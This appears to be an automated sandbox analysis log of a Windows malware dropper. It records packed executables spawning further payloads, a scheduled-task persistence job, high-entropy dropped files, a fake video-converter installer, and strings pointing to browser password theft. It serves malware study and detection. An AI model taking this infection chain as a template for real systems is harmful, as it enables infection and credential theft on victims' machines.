Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Put entropy: 7.9976114418
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Arbitration entropy: 7.99727723824
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Characterized entropy: 7.99711087268
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Entries entropy: 7.99722969418
Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | File created: C:\Users\user\AppData\Local\Temp\Geographic entropy: 7.99870329299
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\36469\L entropy: 7.99955700326
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | File created: C:\Users\user\AppData\Local\Temp\Hills entropy: 7.99438989644
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | File created: C:\Users\user\AppData\Local\Temp\Soundtrack entropy: 7.99781086698
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | File created: C:\Users\user\AppData\Local\Temp\Plumbing entropy: 7.99709677072
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | File created: C:\Users\user\AppData\Local\Temp\Complement entropy: 7.99710096126
Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | File created: C:\Users\user\AppData\Local\Temp\Fm entropy: 7.99863955856
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\764661\F entropy: 7.99919046719
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com | File created: C:\Users\user\AppData\Local\GuardTech Solutions\r entropy: 7.99919046719

System Summary

Source: random[3].exe.9.dr | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_e807faf5-a
Source: random[3].exe.9.dr | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9d5e8b32-3
Source: AApUa7VQiy.exe | Static PE information: section name:
Source: AApUa7VQiy.exe | Static PE information: section name: .idata
Source: AApUa7VQiy.exe | Static PE information: section name:
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.dr | Static PE information: section name:
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.dr | Static PE information: section name: .idata
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.dr | Static PE information: section name:
Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.dr | Static PE information: section name:
Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.dr | Static PE information: section name: .idata
Source: skotes.exe.6.dr | Static PE information: section name:
Source: skotes.exe.6.dr | Static PE information: section name: .idata
Source: random[2].exe.9.dr | Static PE information: section name:
Source: random[2].exe.9.dr | Static PE information: section name: .idata
Source: 62950fb3a8.exe.9.dr | Static PE information: section name:
Source: 62950fb3a8.exe.9.dr | Static PE information: section name: .idata
Source: random[4].exe.9.dr | Static PE information: section name:
Source: random[4].exe.9.dr | Static PE information: section name: .idata
Source: random[4].exe.9.dr | Static PE information: section name:
Source: 072d564b60.exe.9.dr | Static PE information: section name:
Source: 072d564b60.exe.9.dr | Static PE information: section name: .idata
Source: 072d564b60.exe.9.dr | Static PE information: section name:
Source: random[3].exe0.9.dr | Static PE information: section name:
                            Source: random[3].exe0.9.drStatic PE information: section name: .idata
                            Source: random[3].exe0.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name: .idata
                            Source: d37c6a3c82.exe.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: random[2].exe0.9.drStatic PE information: section name: .idata
                            Source: random[2].exe0.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: 513076b4b2.exe.9.drStatic PE information: section name: .idata
                            Source: 513076b4b2.exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5[1].exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: ktIplF5.exe.9.drStatic PE information: section name: .idata
                            Source: ktIplF5.exe.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: random[1].exe1.9.drStatic PE information: section name: .idata
                            Source: random[1].exe1.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: df1b740bf8.exe.9.drStatic PE information: section name: .idata
                            Source: df1b740bf8.exe.9.drStatic PE information: section name:
                            Source: flv2aviconverter24.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Flv2AVIConverter.exe.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile created: C:\Windows\Tasks\skotes.job
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\DpInvestigated
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\PromotionalToken
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\PropeciaJoan
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeFile created: C:\Windows\WestCornell
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\SchedulesAb
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\ContainsBefore
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\TokenDetroit
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeFile created: C:\Windows\AttacksContacted
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B478BB6_2_00B478BB
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B488606_2_00B48860
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B470496_2_00B47049
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B431A86_2_00B431A8
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B04B306_2_00B04B30
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B04DE06_2_00B04DE0
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B42D106_2_00B42D10
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B4779B6_2_00B4779B
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_00B37F366_2_00B37F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000670497_2_00067049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000688607_2_00068860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000678BB7_2_000678BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_000631A87_2_000631A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00024B307_2_00024B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00062D107_2_00062D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00024DE07_2_00024DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00057F367_2_00057F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_0006779B7_2_0006779B
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Flv2AVIConverter\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: String function: 00B180C0 appears 130 times
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 000380C0 appears 130 times
                            Source: random[1].exe0.9.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                            Source: 179187318e.exe.9.drStatic PE information: Resource name: RT_VERSION type: 0420 Alliant virtual executable common library not stripped
                            Source: random[1].exe2.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: f46bdbcca4.exe.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: infinity.tmp.10.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: flv2aviconverter24.exe.11.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-2E87P.tmp.11.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                            Source: Flv2AVIConverter.exe.12.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                            Source: f46bdbcca4.tmp.31.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: f46bdbcca4.tmp.31.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: f46bdbcca4.tmp.33.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: f46bdbcca4.tmp.33.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-0DEO7.tmp.34.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                            Source: is-0DEO7.tmp.34.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Source: is-B6V2L.tmp.11.drStatic PE information: Number of sections : 19 > 10
                            Source: is-M72JG.tmp.34.drStatic PE information: Number of sections : 23 > 10
                            Source: sqlite3.dll.12.drStatic PE information: Number of sections : 19 > 10
                            Source: random[3].exe1.9.drStatic PE information: No import functions for PE file found
                            Source: 6299d9e5a5.exe.9.drStatic PE information: No import functions for PE file found
                            Source: random[3].exe1.9.drStatic PE information: Data appended to the last section found
                            Source: 6299d9e5a5.exe.9.drStatic PE information: Data appended to the last section found
                            Source: AApUa7VQiy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: AApUa7VQiy.exeStatic PE information: Section: ZLIB complexity 0.9987018864329268
                            Source: AApUa7VQiy.exeStatic PE information: Section: litpxdqa ZLIB complexity 0.9944398603008904
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978393222070845
                            Source: skotes.exe.6.drStatic PE information: Section: ZLIB complexity 0.9978393222070845
                            Source: random[4].exe.9.drStatic PE information: Section: ZLIB complexity 0.9986840224847561
                            Source: random[4].exe.9.drStatic PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
                            Source: 072d564b60.exe.9.drStatic PE information: Section: ZLIB complexity 0.9986840224847561
                            Source: 072d564b60.exe.9.drStatic PE information: Section: zqjesnms ZLIB complexity 0.994311055792034
                            Source: random[3].exe0.9.drStatic PE information: Section: ZLIB complexity 0.9983653846153846
                            Source: random[3].exe0.9.drStatic PE information: Section: gopdotwy ZLIB complexity 0.994856120556698
                            Source: d37c6a3c82.exe.9.drStatic PE information: Section: ZLIB complexity 0.9983653846153846
                            Source: d37c6a3c82.exe.9.drStatic PE information: Section: gopdotwy ZLIB complexity 0.994856120556698
                            Source: random[2].exe0.9.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: 513076b4b2.exe.9.drStatic PE information: Section: bzipjhra ZLIB complexity 0.994681526565322
                            Source: ktIplF5[1].exe.9.drStatic PE information: Section: ZLIB complexity 0.9985649294969512
                            Source: ktIplF5[1].exe.9.drStatic PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
                            Source: ktIplF5.exe.9.drStatic PE information: Section: ZLIB complexity 0.9985649294969512
                            Source: ktIplF5.exe.9.drStatic PE information: Section: mzomafvq ZLIB complexity 0.994594894431988
                            Source: random[1].exe0.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: 179187318e.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: random[1].exe1.9.drStatic PE information: Section: ZLIB complexity 1.0003080638801263
                            Source: random[1].exe1.9.drStatic PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
                            Source: df1b740bf8.exe.9.drStatic PE information: Section: ZLIB complexity 1.0003080638801263
                            Source: df1b740bf8.exe.9.drStatic PE information: Section: jxlmjtji ZLIB complexity 0.9947070020553064
                            Source: random[2].exe1.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: 61f0c6628c.exe.9.drStatic PE information: Section: .reloc ZLIB complexity 1.002685546875
                            Source: d37c6a3c82.exe.9.drStatic PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: random[3].exe0.9.drStatic PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                            Source: random[2].exe2.9.dr, aNQaxxDiYjXg.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 4ee3234999.exe.9.dr, aNQaxxDiYjXg.csCryptographic APIs: 'TransformFinalBlock'
                            Source: random[2].exe2.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csBase64 encoded string: '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'
                            Source: 4ee3234999.exe.9.dr, uBQRQemRwragayxWIgNspKbnCcaXv.csBase64 encoded string: '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'
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@95/129@48/9
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\QBQOKU2Y.htm
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1480:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4912:120:WilError_03
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeFile read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                            Source: AApUa7VQiy.exe, 00000000.00000003.1329606263.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1329196855.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1341479380.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1942518285.0000000005B99000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1942216567.0000000005AF8000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1925905974.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.1926471261.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: flv2aviconverter24.exe, 0000000C.00000002.2827078117.000000006096F000.00000002.00000001.01000000.00000010.sdmp, flv2aviconverter24.exe, 0000000C.00000003.1846753934.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                            Source: AApUa7VQiy.exeVirustotal: Detection: 61%
                            Source: AApUa7VQiy.exeReversingLabs: Detection: 52%
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: BEB973FPO2R62ZWABVOVP8TC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeFile read: C:\Users\user\Desktop\AApUa7VQiy.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\AApUa7VQiy.exe "C:\Users\user\Desktop\AApUa7VQiy.exe"
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe "C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe"
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe"
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -i
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe"
